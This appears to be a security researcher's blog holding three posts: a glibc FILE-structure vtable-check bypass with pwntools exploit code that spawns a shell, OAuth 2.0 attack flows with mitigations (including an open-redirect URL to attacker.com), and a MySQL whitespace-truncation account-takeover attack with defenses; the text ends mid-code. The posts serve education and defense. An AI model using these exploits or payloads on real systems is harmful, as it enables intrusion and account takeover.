Dhaval Kapil

FILE Structure Exploitation ('vtable' check bypass)

2018-01-12T00:00:00+00:00

Introduction

‘FILE’ structure exploitation is one of the common ways to gain control over execution flow. The attacker overwrites a ‘FILE’ pointer (say stdin, stdout, stderr or any other file handler opened by fopen()) to point to his/her own forged structure. This structure contains vtable, a pointer to a table of functions that are called when the original ‘FILE’ pointer is used to perform different operations (such as fread, fwrite, etc.). However, checks have recently been incorporated in libc that restrict the values vtable may take, which protects against most of these attacks.

Kees Cook has written an informative article about ‘Abusing the FILE structure’. This technique will no longer work in the patched libc. Another possible way to exploit the ‘FILE’ structure is to forge the read, write pointers instead of the vtable. This technique is highlighted by Angelboy in his presentation: Play with FILE Structure - Yet Another Binary Exploit Technique.

In this post, I’ll be describing the protection mechanism introduced recently in libc and a possible way to bypass it. We’ll not only get RIP control, but also control over the first three parameters in RDI, RSI and RDX respectively. I’ll be only targeting the vtable pointer.

Prerequisites

It is assumed that the reader is familiar with the current FILE structure and the common (though now obsolete) attack on vtable. The two resources mentioned previously, Kees Cook’s article and Angelboy’s presentation, are sufficient to get the necessary background.

Protection mechanism

Two new functions have been added to protect against tampering with the vtable pointer: IO_validate_vtable and _IO_vtable_check. Every vtable reference is first passed through IO_validate_vtable (which internally uses _IO_vtable_check). In case tampering is detected, the program aborts, otherwise the corresponding vtable pointer is returned.

/*
  IO_validate_vtable
  Source: https://code.woboq.org/userspace/glibc/libio/libioP.h.html#IO_validate_vtable
 */

/* Perform vtable pointer validation.  If validation fails, terminate
   the process.  */
static inline const struct _IO_jump_t *
IO_validate_vtable (const struct _IO_jump_t *vtable)
{
  /* Fast path: The vtable pointer is within the __libc_IO_vtables
     section.  */
  uintptr_t section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables;
  const char *ptr = (const char *) vtable;
  uintptr_t offset = ptr - __start___libc_IO_vtables;
  if (__glibc_unlikely (offset >= section_length))
    /* The vtable pointer is not in the expected section.  Use the
       slow path, which will terminate the process if necessary.  */
    _IO_vtable_check ();
  return vtable;
}

The function checks whether the vtable pointer lies inside the __libc_IO_vtables section or not. If not, it further checks the pointer by calling _IO_vtable_check. This section contains some vtables of the type _IO_jump_t (source). The original vtable is also part of it.
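
The fast path above boils down to a single unsigned comparison. Here is a minimal Python model of it, assuming 64-bit pointers; the section bounds are made-up values for illustration and not taken from any real libc.

```python
MASK64 = (1 << 64) - 1  # model uintptr_t arithmetic on a 64-bit target


def in_vtable_section(vtable, start, stop):
    """Return True when vtable passes the fast-path range check."""
    section_length = (stop - start) & MASK64
    # Unsigned subtraction wraps around when vtable < start, so one
    # comparison rejects pointers both below and above the section.
    offset = (vtable - start) & MASK64
    return offset < section_length


# Hypothetical bounds of __libc_IO_vtables, chosen only for this example.
START, STOP = 0x7F0000003000, 0x7F0000003D68

print(in_vtable_section(START + 0xD8, START, STOP))  # pointer inside the section
print(in_vtable_section(0x601080, START, STOP))      # e.g. a forged table elsewhere
```

Any pointer for which this returns True skips _IO_vtable_check entirely, which is what the attack below relies on.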

/*
  _IO_vtable_check
  Source: https://code.woboq.org/userspace/glibc/libio/vtables.c.html#_IO_vtable_check
*/

void attribute_hidden
_IO_vtable_check (void)
{
#ifdef SHARED
  void (*flag) (void) = atomic_load_relaxed (&IO_accept_foreign_vtables);
#ifdef PTR_DEMANGLE
  PTR_DEMANGLE (flag);
#endif
  if (flag == &_IO_vtable_check)
    return;
  {
    Dl_info di;
    struct link_map *l;
    if (_dl_open_hook != NULL
       || (_dl_addr (_IO_vtable_check, &di, &l, NULL) != 0
            && l->l_ns != LM_ID_BASE))
      return;
  }
#else /* !SHARED */
  if (__dlopen != NULL)
    return;
#endif
  __libc_fatal ("Fatal error: glibc detected an invalid stdio handle\n");
}

Attack

In this attack, we will make the FILE’s vtable point to some other place (useful), which is already inside the __libc_IO_vtables section. This will pass the security check. I came across this attack while going through a CTF writeup. The _IO_str_jumps is also part of this section (source). It contains a pointer to the function _IO_str_overflow which is useful for our purpose.

/* Source: https://code.woboq.org/userspace/glibc/libio/strops.c.html#_IO_str_overflow
*/

_IO_str_overflow (_IO_FILE *fp, int c)
{
  int flush_only = c == EOF;
  _IO_size_t pos;
  if (fp->_flags & _IO_NO_WRITES)
      return flush_only ? 0 : EOF;
  if ((fp->_flags & _IO_TIED_PUT_GET) && !(fp->_flags & _IO_CURRENTLY_PUTTING))
    {
      fp->_flags |= _IO_CURRENTLY_PUTTING;
      fp->_IO_write_ptr = fp->_IO_read_ptr;
      fp->_IO_read_ptr = fp->_IO_read_end;
    }
  pos = fp->_IO_write_ptr - fp->_IO_write_base;
  if (pos >= (_IO_size_t) (_IO_blen (fp) + flush_only))
    {
      if (fp->_flags & _IO_USER_BUF) /* not allowed to enlarge */
        return EOF;
      else
    {
      char *new_buf;
      char *old_buf = fp->_IO_buf_base;
      size_t old_blen = _IO_blen (fp);
      _IO_size_t new_size = 2 * old_blen + 100;
      if (new_size < old_blen)
        return EOF;
      new_buf
        = (char *) (*((_IO_strfile *) fp)->_s._allocate_buffer) (new_size);

        /* ^ Getting RIP control !*/

We shall overwrite the vtable in such a manner so that instead of calling the regular ‘FILE’ associated function, _IO_str_overflow would be called. Since we can already forge fp, we can control the execution flow, along with the first three parameters in this line:

(char *) (*((_IO_strfile *) fp)->_s._allocate_buffer) (new_size);

fp->_s._allocate_buffer is at a fixed offset within fp and new_size is being calculated from the members of fp. The offset can be calculated by reversing the binary or through gdb. In my case, the offset was 0xe0, which is directly after vtable pointer. new_size is calculated as follows:

#define _IO_blen(fp) ((fp)->_IO_buf_end - (fp)->_IO_buf_base)
size_t old_blen = _IO_blen (fp);
_IO_size_t new_size = 2 * old_blen + 100;

Hence, we can craft any ‘even’ value for new_size by setting appropriate _IO_buf_end and _IO_buf_base. For instance, if we want new_size to be equal to x, set _IO_buf_base = 0 and _IO_buf_end = (x - 100)/2. However, we also have to pass a check before arriving at the particular call instruction:

int flush_only = c == EOF;
pos = fp->_IO_write_ptr - fp->_IO_write_base;
if (pos >= (_IO_size_t) (_IO_blen (fp) + flush_only))

flush_only is 0, so we want pos >= _IO_blen(fp). This can be achieved by setting _IO_write_ptr = (x - 100)/2 and _IO_write_base = 0.

Regarding the second and third parameters, let’s reverse the binary at assembly level and trace back the registers rsi and rdx before the call instruction:

mov     rdx, [rdi+28h]
mov     rsi, rdx
sub     rsi, [rdi+20h]

rdi + 0x28 matches with fp->_IO_write_ptr. rdi + 0x20 matches with _IO_write_base. Note that we already have a restriction that _IO_write_ptr - _IO_write_base should be greater than or equal to (rdi - 100)/2. Hence, we cannot have arbitrary values for rsi and rdx.
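
To sanity check the arithmetic, the relevant part of _IO_str_overflow can be modelled in a few lines of Python. This is only a sketch: it assumes the flag checks have already been passed, ignores 64-bit wraparound, and uses a made-up target value.

```python
EOF = -1


def str_overflow_call_args(write_base, write_ptr, buf_base, buf_end, c=0):
    """Model the register values at the _allocate_buffer call, or None."""
    flush_only = 1 if c == EOF else 0
    pos = write_ptr - write_base
    blen = buf_end - buf_base
    if pos < blen + flush_only:
        return None  # buffer considered large enough, no call is made
    new_size = 2 * blen + 100
    # rdi = new_size, rdx = _IO_write_ptr, rsi = _IO_write_ptr - _IO_write_base
    return {"rdi": new_size, "rsi": pos, "rdx": write_ptr}


target = 0x7F1234567890  # hypothetical even value we want in rdi
half = (target - 100) // 2
args = str_overflow_call_args(write_base=0, write_ptr=half,
                              buf_base=0, buf_end=half)
print({name: hex(value) for name, value in args.items()})
```

For an odd target the integer division loses one, so rdi ends up as target - 1. That is why only even values can be crafted.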

Now, with this let’s try our own exploit. Consider the vulnerable code:

/* gcc vuln.c -o vuln */

#include <stdio.h>
#include <unistd.h>

char fake_file[0x200];

int main() {
  FILE *fp;
  puts("Leaking libc address of stdout:");
  printf("%p\n", stdout); // Emulating libc leak
  puts("Enter fake file structure");
  read(0, fake_file, 0x200);
  fp = (FILE *)&fake_file;
  fclose(fp);
  return 0;
}

Here is the link to the above mentioned code. You might want to work with the same binary and libc that I used. I am running it on Ubuntu 16.04.

The program first simulates a leak of an address in libc. It then takes input in a global variable fake_file and points the file pointer fp to it. Next, it closes the file pointer using fclose(fp).

The first step towards developing the exploit is to realize the target that we want to achieve. Namely, calling system("/bin/sh"). I shall be using pwntools library. The binary comes with a libc leak, making it easier for us to calculate the address of system and the string /bin/sh within the libc.

rip = libc_base + libc.symbols['system']
rdi = libc_base + next(libc.search(b"/bin/sh"))

Our next step is to point vtable to some address, such that, fclose will actually call _IO_str_overflow. I used gdb to find the relative offset of a pointer to _IO_str_overflow from _IO_file_jumps, which apparently is 0xd8 for the provided libc. Now, if I point the vtable to 0x10 bytes before it, fclose will call _IO_str_overflow (again from gdb).

io_str_overflow_ptr_addr = libc_base + libc.symbols['_IO_file_jumps'] + 0xd8
# Calculate the vtable by subtracting appropriate offset
fake_vtable_addr = io_str_overflow_ptr_addr - 2*8
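
The 0x10 adjustment can be read as "make the slot that fclose uses line up with the pointer to _IO_str_overflow". Below is a small sketch of that calculation, assuming fclose dispatches through the __finish slot and that the first slots of struct _IO_jump_t are laid out as in glibc's libioP.h; all addresses are hypothetical.

```python
WORD = 8  # pointer size on x86-64

# Assumed order of the first entries in struct _IO_jump_t.
JUMP_SLOTS = ["__dummy", "__dummy2", "__finish", "__overflow"]


def fake_vtable_for(slot_name, target_ptr_addr):
    """Return a vtable address whose slot_name entry is the pointer stored at target_ptr_addr."""
    return target_ptr_addr - JUMP_SLOTS.index(slot_name) * WORD


# Hypothetical address of the table entry that holds &_IO_str_overflow.
ptr_addr = 0x7F0000003AD8
print(hex(fake_vtable_for("__finish", ptr_addr)))
```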

Next, we can craft our fake ‘FILE’ structure by setting appropriate vtable and also other pointers so as to call rip with rdi as a parameter.

# Craft file struct (integer division keeps the values integral on Python 3 too)
file_struct = pack_file(_IO_buf_base = 0,
                        _IO_buf_end = (rdi-100)//2,
                        _IO_write_ptr = (rdi-100)//2,
                        _IO_write_base = 0,
                        _lock = bin.symbols['fake_file'] + 0x80)
# vtable pointer
file_struct += p64(fake_vtable_addr)
# (*((_IO_strfile *) fp)->_s._allocate_buffer)
file_struct += p64(rip)
file_struct = file_struct.ljust(0x100, b"\x00")

Note that we also have to set fp->_lock to an address pointing to NULL to prevent fclose waiting on someone else for releasing the lock. The complete exploit can be downloaded here.
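
For readers without the pack_file helper at hand, here is a rough standalone equivalent using only the standard library. The field offsets are assumptions for struct _IO_FILE on x86-64 glibc (verify them in gdb for your libc), build_fake_file is a hypothetical name, and every address in the usage is made up.

```python
import struct

# Assumed field offsets for x86-64 glibc; check them against your target.
OFFSETS = {
    "_IO_write_base": 0x20,
    "_IO_write_ptr": 0x28,
    "_IO_buf_base": 0x38,
    "_IO_buf_end": 0x40,
    "_lock": 0x88,
    "vtable": 0xD8,
    "_allocate_buffer": 0xE0,  # first field after the vtable pointer
}


def build_fake_file(size=0x100, **fields):
    """Return a zero-filled buffer with the given 64-bit fields written in."""
    buf = bytearray(size)
    for name, value in fields.items():
        struct.pack_into("<Q", buf, OFFSETS[name], value)
    return bytes(buf)


rdi = 0x7F0000123456          # hypothetical address of "/bin/sh" (even)
half = (rdi - 100) // 2
blob = build_fake_file(
    _IO_write_base=0, _IO_write_ptr=half,
    _IO_buf_base=0, _IO_buf_end=half,
    _lock=0x601100,               # hypothetical address that holds NULL
    vtable=0x7F0000003AC8,        # hypothetical fake vtable address
    _allocate_buffer=0x7F0000045390,  # hypothetical address of system
)
print(len(blob))
```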

Note: Another possible function (instead of _IO_str_overflow) that one could use is _IO_wstr_finish() as seen in this post by Josh Wang.

Conclusion

Given that an attacker has control over a few fields of the ‘FILE’ structure (for rdi), the vtable pointer and 8 bytes after it (for rip), the additional check on vtable offers little protection.

Attacking the OAuth Protocol

2017-02-17T00:00:00+00:00

This post is about developing a secure OAuth 2.0 server, the inherent weaknesses of the protocol, and their mitigation.

Introduction

Recently, I had the opportunity to mentor a fellow student at SDSLabs on a project related to the OAuth 2.0 protocol. It was then that I decided to read the official manual for OAuth 2.0. It took me a few hours to go through the entire document and analyze it.

The OAuth 2.0 protocol itself is insecure. The document specifies some security measures that are optional (which boils down to missing for the casual developer). Apart from that, there are additional loopholes as well. Herein, I try to enumerate the various vulnerabilities of the OAuth 2.0 protocol which I found after reading the standard and a couple of online resources. I suggest mitigation to each of these which might be either following the standard strictly or even changing the standard slightly.

This is aimed to benefit both: developers working with OAuth 2.0 as well as security researchers.

Overview

I’ll be assuming that the reader is familiar with the OAuth 2.0 protocol. There are tons of online resources to read up on this. The reader should also be familiar with basic attacks like CSRF, XSS and open redirect. I’ll be mainly focussing on the Authorization code grant and a little on the Implicit grant. As a refresher, these are the steps involved in an Authorization code grant:

1. The user requests the client to start the authorization process through the user-agent by issuing a GET request. This happens when the user clicks on the ‘Connect’/’Sign in with’ button on the client’s website.
2. The client redirects the user-agent to the authorization server using the following query parameters:
   - response_type: code
   - client_id: The id issued to the client.
   - redirect_uri (optional): The URI where the authorization server will redirect the response to.
   - scope (optional): The scope to be requested.
   - state (recommended): An opaque value to maintain state between the request and callback.
3. After the user authenticates and grants authorization for requested resources, the authorization server redirects the user-agent to the redirect_uri with the following query parameters:
   - code: The authorization code.
   - state: The value passed in the above request.
4. The client further uses the authorization code to request an access token (with appropriate client authentication) using the following parameters in the request body:
   - grant_type: authorization_code
   - code: The authorization code received earlier.
   - redirect_uri: The redirect_uri passed in the first request.
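
As a concrete illustration of the 2nd request, the redirect URL can be assembled like this. It is a sketch only: the endpoint, client id and callback URL are placeholders, and build_authorization_url is a hypothetical helper rather than part of any OAuth library.

```python
from urllib.parse import parse_qs, urlencode, urlparse


def build_authorization_url(authorize_endpoint, client_id, redirect_uri, scope, state):
    """Build the URL the client redirects the user-agent to (request 2)."""
    params = {
        "response_type": "code",
        "client_id": client_id,
        "redirect_uri": redirect_uri,
        "scope": scope,
        "state": state,  # opaque value, echoed back in request 3
    }
    return authorize_endpoint + "?" + urlencode(params)


url = build_authorization_url(
    "https://provider.com/oauth/authorize",  # placeholder endpoint
    "CLIENT_ID",
    "https://client.com/oauth/callback",
    "profile",
    "opaque-per-session-value",
)
print(url)
print(parse_qs(urlparse(url).query)["redirect_uri"])
```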

Attacks

Now, I’m going to talk about various attacks possible by modifying the above-mentioned requests. I’ll be specifying the assumptions in each of the cases separately.

Attacking the ‘Connect’ request

This attack exploits the first request mentioned above, i.e. the request generated when a user clicks ‘Connect’ or ‘Sign in with’ button. Many websites allow users to connect additional accounts like Google, Facebook, Twitter, etc. using OAuth. An attacker can gain access to the victim’s account on the Client by connecting one of his/her own account(on the Provider).

Steps:

1. The attacker creates a dummy account with some Provider.
2. The attacker initiates the ‘Connect’ process with the Client using the dummy account on the Provider, but stops the redirect mentioned in request 3 (in the Authorization code grant flow), i.e. the attacker has granted Client access to his/her resources on the Provider but the Client has not yet been notified.
3. The attacker creates a malicious webpage simulating the following steps:
   - Logging out the user on Provider (using CSRF).
   - Logging in the user on Provider with the credentials of his/her dummy account (using CSRF).
   - Spoofing the 1st request to connect the Provider account with Client. This can be easily done, as it is just another GET request. It is preferred to do this within an iframe so that the victim is unaware of this.
4. When the victim visits the attacker’s page, he/she is logged out of Provider and then gets signed in as the dummy account. The ‘Connect’ request is then issued, which results in the attacker’s dummy account being connected with the victim’s account on Client. Note that the victim will not be asked to grant access to the client, as the attacker has already approved it in Step 2.
5. Now, the attacker can log in to the victim’s account on Client by signing in with the dummy account on Provider.

Mitigation

Although the vulnerability exists on the Provider itself (allowing CSRF log in and log out), it is even better to protect the ‘Connect’ page from requests that do not originate from the user. This can be ensured by using a csrf_token within the client to protect the 1st request. The OAuth 2.0 standard should specify this.

Attacking ‘redirect_uri’

Presently, to prevent attackers from using an arbitrary redirect_uri, many OAuth servers partially match this parameter with a redirect_uri prespecified during client registration. Generally, during registration, the client specifies the domain, and only those redirect_uri on that particular domain are allowed. This becomes dangerous when an attacker finds a page on the client’s domain that is vulnerable to, say, XSS. The attacker can subsequently steal the authorization_code.

Steps:

1. The attacker is able to leak data (say through XSS) from a page on the client’s domain: https://client.com/vuln.
2. The attacker injects Javascript code (if XSS) on that page that sends the URL loaded in the browser (with parameters as well as fragments) to the attacker.
3. The attacker creates a webpage that forces the user to visit a malicious link such as: https://provider.com/oauth/authorize?client_id=CLIENT_ID&response_type=code&redirect_uri=https%3A%2F%2Fclient.com%2Fvuln
4. When the victim loads this link, the user-agent is redirected to https://client.com/vuln?code=CODE. This CODE is then sent to the attacker.
5. The attacker can use this code at his/her end to issue an access token by passing it to the authentic redirect_uri such as https://client.com/oauth/callback?code=CODE.

This attack is even more dangerous if the authorization server supports the Implicit grant. By passing response_type=token, the attacker can steal the token directly.

Mitigation

To prevent the attack for Authorization code grant, OAuth already specifies the following in the standard for an access token request:

The authorization server MUST:

ensure that the “redirect_uri” parameter is present if the “redirect_uri” parameter was included in the initial authorization request as described in Section 4.1.1, and if included ensure that their values are identical.

With this, the attacker will be unable to perform Step 5. The client will request an access token with the authorization_code and the authentic redirect_uri, which will not match https://client.com/vuln. Hence, the authorization server will not grant an access token. However, developers rarely take this into consideration. Individually, this does not represent any real threat, but with other vulnerabilities (as mentioned above), this can lead to leaking of access tokens. Note that this will not prevent attacks on authorization servers using the Implicit grant.

Another protective measure, which in my opinion is more secure and handles both the above cases is that the authorization server should whitelist a list of redirect_uri. Also, while sanitizing this parameter, exact matches should be made instead of partial matches. Usually, clients have predefined redirect_uri and they rarely need to change them.
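
A minimal sketch of such an exact-match whitelist on the authorization server could look like the following. The registry contents and the function name are illustrative assumptions.

```python
# Hypothetical registry filled in at client registration time.
REGISTERED_REDIRECT_URIS = {
    "CLIENT_ID": {"https://client.com/oauth/callback"},
}


def is_allowed_redirect_uri(client_id, redirect_uri):
    """Accept only URIs that exactly equal a registered one (no prefix or domain matching)."""
    return redirect_uri in REGISTERED_REDIRECT_URIS.get(client_id, set())


print(is_allowed_redirect_uri("CLIENT_ID", "https://client.com/oauth/callback"))
print(is_allowed_redirect_uri("CLIENT_ID", "https://client.com/vuln"))
```

With exact matching, the https://client.com/vuln URL from the steps above is rejected even though it is on the registered domain.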

CSRF on Authorization response

By performing a Cross Site Request Forgery attack, an attacker can link a dummy account on Provider with victim’s account on Client(as mentioned in the first attack). This attack uses the 3rd request of the Authorization code grant.

Steps:

1. The attacker creates a dummy account on Provider.
2. The attacker initiates the ‘Connect’ process with the Client using the dummy account on the Provider, but stops the redirect mentioned in request 3 (in the Authorization code grant flow), i.e. the attacker has granted Client access to his/her resources on the Provider but the Client has not yet been notified. The attacker saves the authorization_code.
3. The attacker forces the victim to make a request to: https://client.com/<provider>/login?code=AUTH_CODE. This can be easily done by making the victim open a malicious webpage with any img or script tag with the above URL as src.
4. If the victim is logged in to Client, the attacker’s dummy account is now connected to his/her account.
5. Now, the attacker can log in to the victim’s account on Client by signing in with the dummy account on Provider.

Mitigation

OAuth 2.0 provides security against such attacks through the state parameter passed in the 2nd and 3rd request. It acts like a CSRF token. The attacker cannot forge a malicious URL without knowing the state, which is specific to the user’s session. However, in the current OAuth specification, this parameter is optional, NOT required. Developers not well versed in security are likely to ignore it.

OAuth 2.0 should force clients to send a state parameter and handle requests that are missing this parameter as ‘error requests’. Proper guidelines should also be given for generating and handling csrf tokens.
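
One possible way for a client to generate and check state is sketched below. The session is modelled as a plain dict and both function names are hypothetical; a real client would use its web framework's session store.

```python
import hmac
import secrets


def new_state(session):
    """Create an unguessable state value and remember it in the user's session."""
    state = secrets.token_urlsafe(32)
    session["oauth_state"] = state
    return state


def verify_state(session, returned_state):
    """Check the state echoed back in request 3; each value is usable once."""
    expected = session.pop("oauth_state", None)
    if expected is None or returned_state is None:
        return False  # a missing state is treated as an error request
    return hmac.compare_digest(expected.encode(), returned_state.encode())


session = {}
state = new_state(session)
print(verify_state(session, state))   # the legitimate callback
print(verify_state(session, state))   # replaying the same value
```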

Note: Using the state parameter does not prevent the first attack mentioned above(Attacking the ‘Connect’ request).

Reusing an access token - One access_token to rule them all

OAuth 2.0 considers access_token to be independent of any client. All it ensures is that an access_token stored on the authorization server is mapped to appropriate scopes and expiration time. An access token generated for client1 can be used for client2 as well. This poses a danger to clients using the Implicit grant.

Steps:

1. The attacker creates an authentic client application client1 and registers it with a Provider.
2. The attacker somehow manages to get the victim to use client1. Thereby, he/she has access to the access token of the victim on client1.
3. Assume that the victim uses client2, which in turn uses the Implicit grant. In the Implicit grant, the authorization server redirects the user-agent to a URL such as: https://client2.com/callback#access_token=ACCESS_TOKEN. The attacker visits this URL with the victim’s access_token obtained through client1.
4. client2 authenticates the attacker as the victim. Hence, a single access token can be used on many different clients that use the Implicit grant.

Mitigation

Clients must ensure that the access token being used was indeed issued to them. Some OAuth servers, like Facebook, provide endpoints to look up the client a particular access_token was issued to: https://graph.facebook.com/app?fields=id&access_token=ACCESS_TOKEN.
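
On the client side, the check might be sketched as follows. It assumes the lookup endpoint answers with a JSON object whose "id" field names the client the token was issued to; that response shape, the function name and the sample values are assumptions, so consult the provider's documentation.

```python
import json


def token_issued_to(response_body, expected_client_id):
    """Return True only if the lookup response names our own client id."""
    try:
        data = json.loads(response_body)
    except ValueError:
        return False  # unparsable response: refuse the token
    return isinstance(data, dict) and data.get("id") == expected_client_id


# Hypothetical response body for a token issued to another client.
body = '{"id": "client1-app-id"}'
print(token_issued_to(body, "client2-app-id"))
```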

Open Redirect in OAuth 2.0

The OAuth 2.0 standard specifies the following guidelines for handling errors in Authorization requests:

If the request fails due to a missing, invalid, or mismatching redirection URI, or if the client identifier is missing or invalid, the authorization server SHOULD inform the resource owner of the error and MUST NOT automatically redirect the user-agent to the invalid redirection URI.

If the resource owner denies the access request or if the request fails for reasons other than a missing or invalid redirection URI, the authorization server informs the client by adding the following parameters to the query component of the redirection URI using the “application/x-www-form-urlencoded” format, per Appendix B:

Some OAuth servers misinterpret this and interchange the order of the two checks. That is, if the request fails for reasons other than the redirection URI, such as an invalid scope, the server informs the client by redirecting to the URL passed in the request without validating it. This makes the OAuth server act as an open redirector. A possible URL crafted by the attacker can be https://provider.com/oauth/authorize?response_type=code&client_id=CLIENT_ID&scope=INVALID_SCOPE&redirect_uri=http://attacker.com/.

This vulnerability was once present in Facebook, Microsoft, and Google.

Mitigation

The mitigation is trivial: the authorization server should first validate the redirect_uri parameter and continue accordingly.
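
The intended order of checks can be sketched like this. The registry, the scope list and the return convention are all illustrative assumptions, not a real server's API.

```python
from urllib.parse import urlencode

# Hypothetical server-side configuration.
REGISTERED = {"CLIENT_ID": {"https://client.com/oauth/callback"}}
VALID_SCOPES = {"profile", "email"}


def handle_authorization_request(client_id, redirect_uri, scope):
    """Validate redirect_uri before any error is reported by redirecting to it."""
    if redirect_uri not in REGISTERED.get(client_id, set()):
        # Never redirect to an unvalidated URI: show an error page instead.
        return ("error_page", "invalid client_id or redirect_uri")
    if scope not in VALID_SCOPES:
        # Only now is it safe to report the error through the redirect.
        return ("redirect", redirect_uri + "?" + urlencode({"error": "invalid_scope"}))
    return ("consent_page", None)


print(handle_authorization_request("CLIENT_ID", "http://attacker.com/", "INVALID_SCOPE"))
```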

Conclusion

In short, while developing an OAuth server, security should be kept in mind. Knowledge about various attack vectors is necessary. The OAuth specification should be updated to enforce the appropriate security measures mentioned above. Oauth by Sakurity is a great improvement over OAuth 2.0.

This list is not complete. If you know of any other attacks or even better ways to mitigate the above-mentioned attacks feel free to comment!

SQL Attack (Constraint-based)

2016-12-25T00:00:00+00:00

Introduction

It is good to know that nowadays, developers have started paying attention to security while building websites. Almost everyone is aware of SQL Injection. Herein, I would like to discuss another kind of vulnerability related to SQL databases which is as dangerous as SQL Injection, and yet not as common. I shall demonstrate the attack and discuss various defense strategies.

Disclaimer: This post is NOT about SQL Injection.

Background

Recently, I came across an interesting piece of code. The developer had tried to make every possible attempt to secure access to the database. The following code is run whenever a new user tries to register:

<?php
// Checking whether a user with the same username exists
$username = mysql_real_escape_string($_GET['username']);
$password = mysql_real_escape_string($_GET['password']);
$query = "SELECT * 
          FROM users 
          WHERE username='$username'";

$res = mysql_query($query, $database);
if($res) {
  if(mysql_num_rows($res) > 0) {
    // User exists, exit gracefully
    // ...
  }
  else {
    // If not, only then insert a new entry
    $query = "INSERT INTO users(username, password)
              VALUES ('$username','$password')";
    // ...
  }
}

To check login, the following code is used:

<?php
$username = mysql_real_escape_string($_GET['username']);
$password = mysql_real_escape_string($_GET['password']);

$query = "SELECT username FROM users
          WHERE username='$username'
              AND password='$password' ";

$res = mysql_query($query, $database);
if($res) {
  if(mysql_num_rows($res) > 0){
      $row = mysql_fetch_assoc($res);
      return $row['username'];
  }
}
return Null;

Security considerations?

Filter user input parameters? - CHECK
Use single quotes(‘) for additional security? - CHECK

Cool, what could go wrong?

Well, the attacker can log in as ANY user!

The Attack

It is crucial to understand a few points before talking about the attack.

While performing string handling in SQL, whitespace characters at the end of the string are ignored. In other words, 'vampire' is treated the same as 'vampire '. This is true in most cases, such as strings in a WHERE clause or in INSERT statements. For example, the following query returns the rows whose username is 'vampire'.
```
SELECT * FROM users WHERE username='vampire     ';
```
Exceptions do exist such as the LIKE clause. Note that this trimming of trailing whitespaces is done mostly during ‘string comparison’. This is because, internally, SQL pads one of the strings with whitespaces so that their length matches before comparing them.
In any INSERT query, SQL enforces maximum length constraints on varchar(n) by just using the first ‘n’ characters of the string(in case the length of the string is more than ‘n’ characters). e.g. if a particular column has a length constraint of ‘5’ characters, then inserting ‘vampire’ will result in the insert of only ‘vampi’.

Now, let us setup a testing database to demonstrate the attack.

vampire@linux:~$ mysql -u root -p

mysql> CREATE DATABASE testing;
Query OK, 1 row affected (0.03 sec)

mysql> USE testing;
Database changed

I am going to create a table users with two columns, username and password. Both of these fields will be limited to 25 characters. Next, I will insert a dummy row with ‘vampire’ as the username and ‘my_password’ as the password.

mysql> CREATE TABLE users (
    ->   username varchar(25),
    ->   password varchar(25)
    -> );
Query OK, 0 rows affected (0.09 sec)

mysql> INSERT INTO users
    -> VALUES('vampire', 'my_password');
Query OK, 1 row affected (0.11 sec)

mysql> SELECT * FROM users;
+----------+-------------+
| username | password    |
+----------+-------------+
| vampire  | my_password |
+----------+-------------+
1 row in set (0.00 sec)

To demonstrate the trimming of trailing whitespaces, consider the following query:

mysql> SELECT * FROM users
    -> WHERE username='vampire       ';
+----------+-------------+
| username | password    |
+----------+-------------+
| vampire  | my_password |
+----------+-------------+
1 row in set (0.00 sec)

Now, assume that a vulnerable website uses the earlier mentioned PHP code to handle user registration and login. To break into any user’s account(in this case ‘vampire’), all that is needed to be done is to register with a username ‘vampire[Many whitespaces]1’ and a random password. The chosen username should be such that the first 25 characters should consist only of ‘vampire’ and whitespaces. This will help in bypassing the query which checks whether a particular username already exists or not.

mysql> SELECT * FROM users
    -> WHERE username='vampire                   1';
Empty set (0.00 sec)

Note that while running SELECT queries, SQL does not shorten the string to 25 characters. Hence, the complete string is searched and no result is obtained. Next, when an INSERT query is run, only the first 25 characters are inserted.

mysql>   INSERT INTO users(username, password)
    -> VALUES ('vampire                   1', 'random_pass');
Query OK, 1 row affected, 1 warning (0.05 sec)

mysql> SELECT * FROM users
    -> WHERE username='vampire';
+---------------------------+-------------+
| username                  | password    |
+---------------------------+-------------+
| vampire                   | my_password |
| vampire                   | random_pass |
+---------------------------+-------------+
2 rows in set (0.00 sec)

Great, now there are two users which will be returned when searching for ‘vampire’. Note that the second username is actually ‘vampire’ plus 18 trailing whitespaces. Now, if the attacker logs in with ‘vampire’ and ‘random_pass’, the login query matches the second row and succeeds. Any later SELECT query that searches by the username will return the first, original entry. This will enable the attacker to log in as the original user.
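
The whole sequence can be replayed without a database by modelling the two behaviours described above: comparison that ignores trailing spaces, and truncation to 25 characters on insert. This is a pure Python simulation under those assumptions, not a test against a real SQL engine.

```python
MAX_LEN = 25  # column length used in the post


def pad_space_equal(a, b):
    """Model SQL string comparison that ignores trailing spaces."""
    return a.rstrip(" ") == b.rstrip(" ")


def register(users, username, password):
    """Mimic the vulnerable flow: SELECT on the full string, then a truncating INSERT."""
    if any(pad_space_equal(name, username) for name, _ in users):
        return False  # "user exists"
    users.append((username[:MAX_LEN], password))
    return True


def login(users, username, password):
    """Return the stored username of the first row matching both fields."""
    for name, pw in users:
        if pad_space_equal(name, username) and pad_space_equal(pw, password):
            return name
    return None


users = [("vampire", "my_password")]
print(register(users, "vampire" + " " * 19 + "1", "random_pass"))
logged_in_as = login(users, "vampire", "random_pass")
# A later lookup by username returns the first, original row.
first_match = next(row for row in users if pad_space_equal(row[0], logged_in_as))
print(first_match)
```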

This attack has been successfully tested on MySQL and SQLite. I believe it works in other cases as well.

Defenses

Clearly, this is a major vulnerability and needs to be taken care of while developing secure software. A few of the defense measures that can be taken are as follows:

UNIQUE constraint should be added to columns which are required/expected to be unique. This actually is a very important rule concerning software development. Even if your code tries to maintain integrity, always define your data properly. With a UNIQUE constraint on ‘username’, inserting another entry will not be possible. Both the strings will be detected equal and the INSERT query will fail.
Always prefer using ‘id’ as the primary key for your database table. Also, data should be tracked by their id within the program.
For added security, you can also manually trim input parameters to a particular length(as set in the database).
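
The first and third measures can be combined as in the sketch below, which uses Python's built-in sqlite3 module purely for demonstration. The table layout and helper names are assumptions, and passwords are kept in plain text only to mirror the example above.

```python
import sqlite3

MAX_LEN = 25


def normalize_username(raw):
    """Strip trailing whitespace and reject names that would not fit the column."""
    name = raw.rstrip()
    if not name or len(name) > MAX_LEN:
        raise ValueError("invalid username length")
    return name


conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE users ("
    " id INTEGER PRIMARY KEY,"
    " username TEXT NOT NULL UNIQUE,"  # the database enforces uniqueness
    " password TEXT NOT NULL)"
)


def register(conn, raw_username, password):
    """Return True if the user was created, False if rejected."""
    try:
        name = normalize_username(raw_username)
        with conn:  # commits on success, rolls back on error
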